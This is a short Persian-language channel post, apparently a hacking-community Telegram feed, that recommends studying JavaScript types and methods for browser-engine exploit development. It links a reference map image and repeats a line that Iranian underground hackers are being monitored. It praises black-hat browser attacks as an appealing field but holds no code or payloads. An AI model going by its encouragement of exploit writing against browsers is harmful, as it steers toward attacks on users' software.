یکی از فضاهای بسیار جذاب برای هکرهای بلکهت در خصوص حمله به اهداف خود استفاده از آسیب پذیری های مرورگرها است, که البته در این خصوص قبلا صحبت کردیم,
اما نکته ای که در این پست میتونه براتون مفید باشه اینه که برای طراحی اکسپلویت در خصوص Engine های تفسیری مرورگرها خصوصا Engine مفسر زبان JavaScript, میبایست محققین این امر نگاه دقیقی به Syntax زبان JavaScript داشته و اطلاعات کاملی را از نحوه عملکرد Type های مختلف این زبان داشته باشد,
از این روی یک نقشه کامل از Type ها Method ها و دیگر مباحث مهم در این زبان را برای شما به اشتراک گزاشته خواهد شد تا در ادراک سازوکار های Type های مختلف بر روی حافظه های مختلف در سطح زیرین پیدا کرده و از روی با تسلط بیشتری وارد این دنیای جذاب شد,
برای استفاده از تصویر نقشه بر روی آن زوم بفرمایید...
https://ibb.co/1b1CKb9
@Unk9vvN
#Underground Chat 2020
فعالین حوزه سایبری که بصورت زیر زمینی در ایران فعالیت دارند, همواره تحت نظر هستند...
https://intel471.com
@Unk9vvN
فعالین حوزه سایبری که بصورت زیر زمینی در ایران فعالیت دارند, همواره تحت نظر هستند...
https://intel471.com
@Unk9vvN